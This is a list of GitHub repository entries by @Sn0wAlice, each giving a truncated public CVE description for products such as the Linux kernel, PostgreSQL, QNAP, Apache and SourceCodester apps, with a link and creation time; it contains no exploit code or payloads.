**An XML external entity (XXE) vulnerability in Avaya WebLM admin interface allows authenticated users to read arbitrary files or conduct server-side request forgery (SSRF) attacks via a crafted DTD in an XML request. Affected versions of Avaya WebLM include: 7.0 through 7.1.3.6 and 8.0 through 8.1.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7032](https://github.com/Live-Hack-CVE/CVE-2020-7032) create time: 2022-12-29T02:09:42Z

**An issue was discovered in drivers/accessibility/speakup/spk_ttyio.c in the Linux kernel through 5.9.9. Local attackers on systems with the speakup driver could cause a local denial of service attack, aka CID-d41227544427. This occurs because of an invalid free when the line discipline is used more than once. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28941](https://github.com/Live-Hack-CVE/CVE-2020-28941) create time: 2022-12-29T02:09:39Z

**An issue was discovered in kmem_cache_alloc_bulk in mm/slub.c in the Linux kernel before 5.5.11. The slowpath lacks the required TID increment, aka CID-fd4d9c7d0c71. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-29370](https://github.com/Live-Hack-CVE/CVE-2020-29370) create time: 2022-12-29T02:09:35Z

**Use-after-free vulnerability in fs/block_dev.c in the Linux kernel before 5.8 allows local users to gain privileges or cause a denial of service by leveraging improper access to a certain error field. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-15436](https://github.com/Live-Hack-CVE/CVE-2020-15436) create time: 2022-12-29T02:09:23Z

**A flaw was found in PostgreSQL versions before 13.1, before 12.5, before 11.10, before 10.15, before 9.6.20 and before 9.5.24. If a client application that creates additional database connections only reuses the basic connection parameters while dropping security-relevant parameters, an opportunity for a man-in-the-mid CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25694](https://github.com/Live-Hack-CVE/CVE-2020-25694) create time: 2022-12-29T02:09:04Z

**A flaw was found in PostgreSQL versions before 13.1, before 12.5, before 11.10, before 10.15, before 9.6.20 and before 9.5.24. An attacker having permission to create non-temporary objects in at least one schema can execute arbitrary SQL functions under the identity of a superuser. The highest threat from this vulnerab CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-25695](https://github.com/Live-Hack-CVE/CVE-2020-25695) create time: 2022-12-29T02:09:01Z

**Out of Bound issue in DSP services while processing received arguments due to improper validation of length received as an argument' in SD820, SD821, SD820, QCS603, QCS605, SDA855, SA6155P, SA6145P, SA6155, SA6155P, SD855, SD 675, SD660, SD429, SD439 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11208](https://github.com/Live-Hack-CVE/CVE-2020-11208) create time: 2022-12-29T02:07:03Z

**Buffer overflow in LibFastCV library due to improper size checks with respect to buffer length' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in APQ8052, APQ8056, APQ8076, APQ8096, APQ8096SG, APQ8098, MDM9655, MSM8952, MSM8956, MSM8976, MSM8976SG, MSM8996, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11207](https://github.com/Live-Hack-CVE/CVE-2020-11207) create time: 2022-12-29T02:06:56Z

**An unrestricted file upload issue in HorizontCMS through 1.0.0-beta allows an authenticated remote attacker (with access to the FileManager) to upload and execute arbitrary PHP code by uploading a PHP payload, and then using the FileManager's rename function to provide the payload (which will receive a random name on t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-27387](https://github.com/Live-Hack-CVE/CVE-2020-27387) create time: 2022-12-29T02:06:52Z

**This affects versions of package browserless-chrome before 1.40.2-chrome-stable. User input flowing from the workspace endpoint gets used to create a file path filePath and this is fetched and then sent back to a user. This can be escaped to fetch arbitrary files from a server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-7758](https://github.com/Live-Hack-CVE/CVE-2020-7758) create time: 2022-12-29T02:06:38Z

**Possible buffer overflow in Fastrpc while handling received parameters due to lack of validation on input parameters' in Snapdragon Auto, Snapdragon Compute, Snapdragon Consumer IOT, Snapdragon Industrial IOT, Snapdragon Mobile in APQ8098, MSM8998, QCM4290, QCM6125, QCS410, QCS4290, QCS610, QCS6125, QSM8250, QSM8350, S CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-11206](https://github.com/Live-Hack-CVE/CVE-2020-11206) create time: 2022-12-29T02:06:31Z

**The SIP ALG implementation on NETGEAR Nighthawk R7000 1.0.9.64_10.2.64 devices allows remote attackers to communicate with arbitrary TCP and UDP services on a victim's intranet machine, if the victim visits an attacker-controlled web site with a modern browser, aka NAT Slipstreaming. This occurs because the ALG takes a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-28041](https://github.com/Live-Hack-CVE/CVE-2020-28041) create time: 2022-12-29T02:06:24Z

**On Juniper Networks Junos OS devices, receipt of a malformed IPv6 packet may cause the system to crash and restart (vmcore). This issue can be trigged by a malformed IPv6 packet destined to the Routing Engine. An attacker can repeatedly send the offending packet resulting in an extended Denial of Service condition. Onl CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-1686](https://github.com/Live-Hack-CVE/CVE-2020-1686) create time: 2022-12-29T02:06:21Z

**ARC Informatique PcVue prior to version 12.0.17 is vulnerable due to the deserialization of untrusted data, which may allow an attacker to remotely execute arbitrary code on the web and mobile back-end server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26867](https://github.com/Live-Hack-CVE/CVE-2020-26867) create time: 2022-12-29T02:06:14Z

**ARC Informatique PcVue prior to version 12.0.17 is vulnerable to a denial-of-service attack due to the ability of an unauthorized user to modify information used to validate messages sent by legitimate web clients. This issue also affects third-party systems based on the Web Services Toolkit. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-26868](https://github.com/Live-Hack-CVE/CVE-2020-26868) create time: 2022-12-29T02:06:07Z

**IBM Cognos Analytics 11.1.7, 11.2.0, and 11.1.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 211240. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38946](https://github.com/Live-Hack-CVE/CVE-2021-38946) create time: 2022-12-29T02:16:18Z

**A flaw was found in mbsync before v1.3.6 and v1.4.2, where an unchecked pointer cast allows a malicious or compromised server to write an arbitrary integer value past the end of a heap-allocated structure by issuing an unexpected APPENDUID response. This could be plausibly exploited for remote code execution on the cli CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-3578](https://github.com/Live-Hack-CVE/CVE-2021-3578) create time: 2022-12-29T02:16:15Z

**Discord-Recon is a bot for the Discord chat service. Versions of Discord-Recon 0.0.3 and prior contain a vulnerability in which a remote attacker is able to overwrite any file on the system with the command results. This can result in remote code execution when the user overwrite important files on the system. As a wor CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-29465](https://github.com/Live-Hack-CVE/CVE-2021-29465) create time: 2022-12-29T02:16:01Z

**A carefully crafted request uri-path can cause mod_proxy_uwsgi to read above the allocated memory and crash (DoS). This issue affects Apache HTTP Server versions 2.4.30 to 2.4.48 (inclusive). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-36160](https://github.com/Live-Hack-CVE/CVE-2021-36160) create time: 2022-12-29T02:15:57Z

**A Command Injection vulnerability exists in the getTopologyHistory service of the Apache Storm 2.x prior to 2.2.1 and Apache Storm 1.x prior to 1.2.4. A specially crafted thrift request to the Nimbus server allows Remote Code Execution (RCE) prior to authentication. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38294](https://github.com/Live-Hack-CVE/CVE-2021-38294) create time: 2022-12-29T02:15:54Z

**An improper access control vulnerability has been reported to affect QNAP NAS. If exploited, this vulnerability allows remote attackers to compromise the security of the software. This issue affects: QNAP Systems Inc. Helpdesk versions prior to 3.0.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28814](https://github.com/Live-Hack-CVE/CVE-2021-28814) create time: 2022-12-29T02:15:51Z

**A command injection vulnerability has been reported to affect certain versions of Video Station. If exploited, this vulnerability allows remote attackers to execute arbitrary commands. This issue affects: QNAP Systems Inc. Video Station versions prior to 5.5.4 on QTS 4.5.2; versions prior to 5.5.4 on QuTS hero h4.5.2; CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28812](https://github.com/Live-Hack-CVE/CVE-2021-28812) create time: 2022-12-29T02:15:47Z

**A crafted method sent through HTTP/2 will bypass validation and be forwarded by mod_proxy, which can lead to request splitting or cache poisoning. This issue affects Apache HTTP Server 2.4.17 to 2.4.48. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-33193](https://github.com/Live-Hack-CVE/CVE-2021-33193) create time: 2022-12-29T02:15:16Z

**Inclusion of sensitive information in the source code has been reported to affect certain QNAP switches running QSS. If exploited, this vulnerability allows attackers to read application data. This issue affects: QNAP Systems Inc. QSS versions prior to 1.0.3 build 20210505 on QSW-M2108-2C; versions prior to 1.0.3 build CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28805](https://github.com/Live-Hack-CVE/CVE-2021-28805) create time: 2022-12-29T02:15:13Z

**A relative path traversal vulnerability has been reported to affect QNAP NAS running QTS and QuTS hero. If exploited, this vulnerability allows attackers to modify files that impact system integrity. QNAP have already fixed this vulnerability in the following versions: QTS 4.5.2.1630 Build 20210406 and later QTS 4.3.6. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28798](https://github.com/Live-Hack-CVE/CVE-2021-28798) create time: 2022-12-29T02:15:10Z

**Adobe Photoshop Elements version 5.2 (and earlier) is affected by an insecure temporary file creation vulnerability. An unauthenticated attacker could leverage this vulnerability to call functions against the installer to perform high privileged actions. Exploitation of this issue does not require user interaction. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28597](https://github.com/Live-Hack-CVE/CVE-2021-28597) create time: 2022-12-29T02:15:06Z

**Magento versions 2.4.2 (and earlier), 2.4.1-p1 (and earlier) and 2.3.6-p1 (and earlier) are vulnerable to an Information Disclosure vulnerability when uploading a modified png file to a product image. Successful exploitation could lead to the disclosure of document root path by an unauthenticated attacker. Access to th CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28566](https://github.com/Live-Hack-CVE/CVE-2021-28566) create time: 2022-12-29T02:15:03Z

**An incorrect default permission vulnerability exists in the cgiserver.cgi cgi_check_ability functionality of reolink RLC-410W v3.0.0.136_20121102. All the Get APIs that are not included in cgi_check_ability are already executable by any logged-in users. An attacker can send an HTTP request to trigger this vulnerability CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-40416](https://github.com/Live-Hack-CVE/CVE-2021-40416) create time: 2022-12-29T02:11:59Z

**A vulnerability in the application authentication and authorization mechanism in Hitachi Energy's TXpert Hub CoreTec 4, that depends on a token validation of the session identifier, allows an unauthorized modified message to be executed in the server enabling an unauthorized actor to change an existing user password, a CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-35530](https://github.com/Live-Hack-CVE/CVE-2021-35530) create time: 2022-12-29T02:11:56Z

**An integer underflow in fuse_lib_readdir enables arbitrary memory read operations in NTFS-3G through 2021.8.22 when using libfuse-lite. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30787](https://github.com/Live-Hack-CVE/CVE-2022-30787) create time: 2022-12-29T02:11:49Z

**A file handle created in fuse_lib_opendir, and later used in fuse_lib_readdir, enables arbitrary memory read and write operations in NTFS-3G through 2021.8.22 when using libfuse-lite. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30785](https://github.com/Live-Hack-CVE/CVE-2022-30785) create time: 2022-12-29T02:11:45Z

**An invalid return code in fuse_kern_mount enables intercepting of libfuse-lite protocol traffic between NTFS-3G and the kernel in NTFS-3G through 2021.8.22 when using libfuse-lite. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-30783](https://github.com/Live-Hack-CVE/CVE-2022-30783) create time: 2022-12-29T02:11:42Z

**GlobalProtect-openconnect versions prior to 1.4.3 are affected by incorrect access control in GPService through DBUS, GUI Application. The way GlobalProtect-Openconnect is set up enables arbitrary users to execute commands as root by submitting the `--script=<script>` parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45809](https://github.com/Live-Hack-CVE/CVE-2021-45809) create time: 2022-12-29T02:11:28Z

**kamadak-exif is an exif parsing library written in pure Rust. In kamadak-exif version 0.5.2, there is an infinite loop in parsing crafted PNG files. Specifically, reader::read_from_container can cause an infinite loop when a crafted PNG file is given. This is fixed in version 0.5.3. No workaround is available. Applicat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21235](https://github.com/Live-Hack-CVE/CVE-2021-21235) create time: 2022-12-29T02:11:24Z

**OneDev is an all-in-one devops platform. In OneDev before version 4.0.3, There is a vulnerability that enabled pre-auth server side template injection via Bean validation message tampering. Full details in the reference GHSA. This issue was fixed in 4.0.3 by disabling validation interpolation completely. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21244](https://github.com/Live-Hack-CVE/CVE-2021-21244) create time: 2022-12-29T02:11:21Z

**OneDev is an all-in-one devops platform. In OneDev before version 4.0.3, there is a critical vulnerability involving the build endpoint parameters. InputSpec is used to define parameters of a Build spec. It does so by using dynamically generated Groovy classes. A user able to control job parameters can run arbitrary co CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21248](https://github.com/Live-Hack-CVE/CVE-2021-21248) create time: 2022-12-29T02:11:12Z

**Laravel is a web application framework. Versions of Laravel before 6.20.11, 7.30.2 and 8.22.1 contain a query binding exploitation. This same exploit applies to the illuminate/database package which is used by Laravel. If a request is crafted where a field that is normally a non-array value is an array, and that input CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21263](https://github.com/Live-Hack-CVE/CVE-2021-21263) create time: 2022-12-29T02:11:08Z

**An integer overflow leading to a heap-buffer overflow was found in OpenEXR in versions before 3.0.1. An attacker could use this flaw to crash an application compiled with OpenEXR. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-26945](https://github.com/Live-Hack-CVE/CVE-2021-26945) create time: 2022-12-29T02:11:03Z

**Redis is an open-source, in-memory database that persists on disk. In affected versions of Redis an integer overflow bug in 32-bit Redis version 4.0 or newer could be exploited to corrupt the heap and potentially result with remote code execution. Redis 4.0 or newer uses a configurable limit for the maximum supported b CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21309](https://github.com/Live-Hack-CVE/CVE-2021-21309) create time: 2022-12-29T02:10:59Z

**An out of memory bounds write flaw (1 or 2 bytes of memory) in the Linux kernel NFS subsystem was found in the way users use mirroring (replication of files with NFS). A user, having access to the NFS mount, could potentially use this flaw to crash the system or escalate privileges on the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-4157](https://github.com/Live-Hack-CVE/CVE-2021-4157) create time: 2022-12-29T02:07:38Z

**MariaDB through 10.5.9 allows attackers to trigger a convert_const_to_int use-after-free when the BIGINT data type is used. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-46669](https://github.com/Live-Hack-CVE/CVE-2021-46669) create time: 2022-12-29T02:07:31Z

**drivers/infiniband/ulp/rtrs/rtrs-clt.c in the Linux kernel before 5.16.12 has a double free related to rtrs_clt_dev_release. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29156](https://github.com/Live-Hack-CVE/CVE-2022-29156) create time: 2022-12-29T02:16:07Z

**** DISPUTED ** The findOne function in TypeORM before 0.3.0 can either be supplied with a string or a FindOneOptions object. When input to the function is a user-controlled parsed JSON object, supplying a crafted FindOneOptions instead of an id string leads to SQL injection. NOTE: the vendor's position is that the user CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-33171](https://github.com/Live-Hack-CVE/CVE-2022-33171) create time: 2022-12-29T02:15:23Z

**A vulnerability classified as critical was found in SourceCodester Cashier Queuing System 1.0. This vulnerability affects unknown code of the file /queuing/login.php of the component Login Page. The manipulation of the argument username/password leads to sql injection. The attack can be initiated remotely. The exploit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3579](https://github.com/Live-Hack-CVE/CVE-2022-3579) create time: 2022-12-29T02:14:59Z

**A vulnerability, which was classified as problematic, has been found in SourceCodester Cashier Queuing System 1.0.1. This issue affects some unknown processing of the component User Creation Handler. The manipulation leads to cross site scripting. The attack may be initiated remotely. The associated identifier of this CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3580](https://github.com/Live-Hack-CVE/CVE-2022-3580) create time: 2022-12-29T02:14:56Z

**A vulnerability, which was classified as problematic, was found in SourceCodester Cashier Queuing System 1.0. Affected is an unknown function of the component Cashiers Tab. The manipulation of the argument Name leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerabi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3581](https://github.com/Live-Hack-CVE/CVE-2022-3581) create time: 2022-12-29T02:14:52Z

**A vulnerability has been found in SourceCodester Simple Cold Storage Management System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation of the argument change password leads to cross-site request forgery. The attack can be launched remotely. The exploit has CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3582](https://github.com/Live-Hack-CVE/CVE-2022-3582) create time: 2022-12-29T02:14:49Z

**A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been rated as critical. This issue affects some unknown processing of the file edituser.php. The manipulation of the argument id leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public an CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3584](https://github.com/Live-Hack-CVE/CVE-2022-3584) create time: 2022-12-29T02:14:45Z

**A vulnerability was found in SourceCodester Canteen Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file login.php. The manipulation of the argument business leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3583](https://github.com/Live-Hack-CVE/CVE-2022-3583) create time: 2022-12-29T02:14:42Z

**A vulnerability classified as problematic has been found in SourceCodester Simple Cold Storage Management System 1.0. Affected is an unknown function of the file /csms/?page=contact_us of the component Contact Us. The manipulation leads to cross-site request forgery. It is possible to launch the attack remotely. The ex CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3585](https://github.com/Live-Hack-CVE/CVE-2022-3585) create time: 2022-12-29T02:14:39Z

**Phpok 6.1 has a deserialization vulnerability via framework/phpok_call.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40889](https://github.com/Live-Hack-CVE/CVE-2022-40889) create time: 2022-12-29T02:14:35Z

**Online Tours & Travels Management System v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /user_operations/profile.php. This vulnerability allows attackers to execute arbitrary code via a crafted PHP file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41537](https://github.com/Live-Hack-CVE/CVE-2022-41537) create time: 2022-12-29T02:14:32Z

**An arbitrary file upload vulnerability in the component /php_action/editProductImage.php of Billing System Project v1.0 allows attackers to execute arbitrary code via a crafted PHP file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41504](https://github.com/Live-Hack-CVE/CVE-2022-41504) create time: 2022-12-29T02:14:28Z

**GetSimple CMS v3.3.16 was discovered to contain a remote code execution (RCE) vulnerability via the edited_file parameter in admin/theme-edit.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41544](https://github.com/Live-Hack-CVE/CVE-2022-41544) create time: 2022-12-29T02:14:25Z

**A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been classified as problematic. This affects an unknown part of the file /csms/admin/?page=system_info of the component Setting Handler. The manipulation of the argument System Name/System Short Name leads to cross site script CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3547](https://github.com/Live-Hack-CVE/CVE-2022-3547) create time: 2022-12-29T02:14:22Z

**A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /csms/admin/?page=user/list of the component Create User Handler. The manipulation of the argument First Name/Last Name leads to cross sit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3546](https://github.com/Live-Hack-CVE/CVE-2022-3546) create time: 2022-12-29T02:13:54Z

**A vulnerability, which was classified as problematic, was found in Linux Kernel. Affected is the function damon_sysfs_add_target of the file mm/damon/sysfs.c of the component Netfilter. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is V CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3544](https://github.com/Live-Hack-CVE/CVE-2022-3544) create time: 2022-12-29T02:13:50Z

**Netgear R6220 v1.1.0.114_1.0.1 suffers from Incorrect Access Control, resulting in a command injection vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42221](https://github.com/Live-Hack-CVE/CVE-2022-42221) create time: 2022-12-29T02:13:47Z

**A vulnerability classified as problematic was found in Linux Kernel. This vulnerability affects the function macvlan_handle_frame of the file drivers/net/macvlan.c of the component skb. The manipulation leads to memory leak. The attack can be initiated remotely. It is recommended to apply a patch to fix this issue. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3526](https://github.com/Live-Hack-CVE/CVE-2022-3526) create time: 2022-12-29T02:13:43Z

**A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is an unknown function of the file mm/memory.c of the component Driver Handler. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The ide CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3523](https://github.com/Live-Hack-CVE/CVE-2022-3523) create time: 2022-12-29T02:13:40Z

**A vulnerability was found in Linux Kernel and classified as problematic. This issue affects the function hugetlb_no_page of the file mm/hugetlb.c. The manipulation leads to race condition. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211019. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3522](https://github.com/Live-Hack-CVE/CVE-2022-3522) create time: 2022-12-29T02:13:36Z

**A vulnerability classified as critical has been found in Linux Kernel. Affected is the function btf_dump_name_dups of the file tools/lib/bpf/btf_dump.c of the component libbpf. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3534](https://github.com/Live-Hack-CVE/CVE-2022-3534) create time: 2022-12-29T02:13:33Z

**A vulnerability was found in Linux Kernel. It has been rated as problematic. This issue affects the function parse_usdt_arg of the file tools/lib/bpf/usdt.c of the component BPF. The manipulation of the argument reg_name leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifi CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3533](https://github.com/Live-Hack-CVE/CVE-2022-3533) create time: 2022-12-29T02:13:29Z

**MITRE CALDERA before 4.1.0 allows XSS in the Operations tab and/or Debrief plugin via a crafted operation name, a different vulnerability than CVE-2022-40605. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40606](https://github.com/Live-Hack-CVE/CVE-2022-40606) create time: 2022-12-29T02:13:26Z

**MITRE CALDERA 4.1.0 allows stored XSS via app.contact.gist (aka the gist contact configuration field), leading to execution of arbitrary commands on agents. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41139](https://github.com/Live-Hack-CVE/CVE-2022-41139) create time: 2022-12-29T02:13:23Z

**A double-free condition exists in contrib/shpsort.c of shapelib 1.5.0 and older releases. This issue may allow an attacker to cause a denial of service or have other unspecified impact via control over malloc. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-0699](https://github.com/Live-Hack-CVE/CVE-2022-0699) create time: 2022-12-29T02:13:19Z

**A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been declared as problematic. This vulnerability affects unknown code of the component Add New Storage Handler. The manipulation of the argument Name leads to cross site scripting. The attack can be initiated remotely. The exp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3548](https://github.com/Live-Hack-CVE/CVE-2022-3548) create time: 2022-12-29T02:13:16Z

**A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function unix_sock_destructor/unix_release_sock of the file net/unix/af_unix.c of the component BPF. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The associated id CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3543](https://github.com/Live-Hack-CVE/CVE-2022-3543) create time: 2022-12-29T02:13:12Z

**Chamilo 1.11.16 is affected by an authenticated local file inclusion vulnerability which allows authenticated users with access to 'big file uploads' to copy/move files from anywhere in the file system into the web directory. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-42029](https://github.com/Live-Hack-CVE/CVE-2022-42029) create time: 2022-12-29T02:13:09Z

**A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /csms/admin/?page=user/manage_user of the component Avatar Handler. The manipulation leads to unrestricted upload. The attack may be initiated r CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3549](https://github.com/Live-Hack-CVE/CVE-2022-3549) create time: 2022-12-29T02:13:06Z

**Auth. (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Mammothology AB Press Optimizer plugin <= 1.1.1 on WordPress. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26375](https://github.com/Live-Hack-CVE/CVE-2022-26375) create time: 2022-12-29T02:13:02Z

**Unspecified vulnerability in OpenSSL before A.00.09.07l on HP-UX B.11.11, B.11.23, and B.11.31 allows local users to cause a denial of service via unspecified vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2007-5536](https://github.com/Live-Hack-CVE/CVE-2007-5536) create time: 2022-12-28T23:24:22Z

**Pragma FortressSSH 5.0 Build 4 Revision 293 and earlier handles long input to sshd.exe by creating an error-message window and waiting for the administrator to click in this window before terminating the sshd.exe process, which allows remote attackers to cause a denial of service (connection slot exhaustion) via a floo CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2008-0132](https://github.com/Live-Hack-CVE/CVE-2008-0132) create time: 2022-12-28T23:30:43Z

**Dell EMC Integrated System for Microsoft Azure Stack Hub, versions 1906 – 2011, contain an undocumented default iDRAC account. A remote unauthenticated attacker, with the knowledge of the default credentials, could potentially exploit this to log in to the system to gain root privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-21505](https://github.com/Live-Hack-CVE/CVE-2021-21505) create time: 2022-12-28T23:19:59Z

**In Red Hat Openshift 1, weak default permissions are applied to the /etc/openshift/server_priv.pem file on the broker server, which could allow users with local access to the broker to read this file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-4281](https://github.com/Live-Hack-CVE/CVE-2013-4281) create time: 2022-12-29T00:44:19Z

**The deployment script in the unsupported "OpenShift Extras" set of add-on scripts, in Red Hat Openshift 1, installs a default public key in the root user's authorized_keys file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-4253](https://github.com/Live-Hack-CVE/CVE-2013-4253) create time: 2022-12-29T00:43:51Z

**cpio 2.11, when using the --no-absolute-filenames option, allows local users to write to arbitrary files via a symlink attack on a file in an archive. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2015-1197](https://github.com/Live-Hack-CVE/CVE-2015-1197) create time: 2022-12-29T00:53:30Z

**MVPower CCTV DVR models, including TV-7104HE 1.8.4 115215B9 and TV7108HE, contain a web shell that is accessible via a /shell URI. A remote unauthenticated attacker can execute arbitrary operating system commands as root. This vulnerability has also been referred to as the "JAWS webserver RCE" because of the easily ide CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-20016](https://github.com/Live-Hack-CVE/CVE-2016-20016) create time: 2022-12-29T00:44:36Z

**D-Link DSL-2750B devices before 1.05 allow remote unauthenticated command injection via the login.cgi cli parameter, as exploited in the wild in 2016 through 2022. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-20017](https://github.com/Live-Hack-CVE/CVE-2016-20017) create time: 2022-12-29T00:04:51Z

**Jenkins before versions 2.44, 2.32.2 is vulnerable to a persisted cross-site scripting in parameter names and descriptions (SECURITY-353). Users with the permission to configure jobs were able to inject JavaScript into parameter names and descriptions. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2601](https://github.com/Live-Hack-CVE/CVE-2017-2601) create time: 2022-12-29T01:34:43Z

**Vulnerability in the Java SE component of Oracle Java SE (subcomponent: Smart Card IO). Supported versions that are affected are Java SE: 6u161, 7u151, 8u144 and 9. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks req CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-10274](https://github.com/Live-Hack-CVE/CVE-2017-10274) create time: 2022-12-29T01:32:50Z

**The Mikrotik RouterOS web server allows memory corruption in releases before Stable 6.38.5 and Long-term 6.37.5, aka Chimay-Red. A remote and unauthenticated user can trigger the vulnerability by sending a crafted HTTP request. An attacker can use this vulnerability to execute arbitrary code on the affected system, as CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20149](https://github.com/Live-Hack-CVE/CVE-2017-20149) create time: 2022-12-29T01:29:22Z

**A vulnerability was found in Navetti PricePoint 4.6.0.0. It has been declared as critical. This vulnerability affects unknown code. The manipulation leads to cross-site request forgery. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 4.7.0.0 is ab CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-20045](https://github.com/Live-Hack-CVE/CVE-2017-20045) create time: 2022-12-29T00:43:41Z

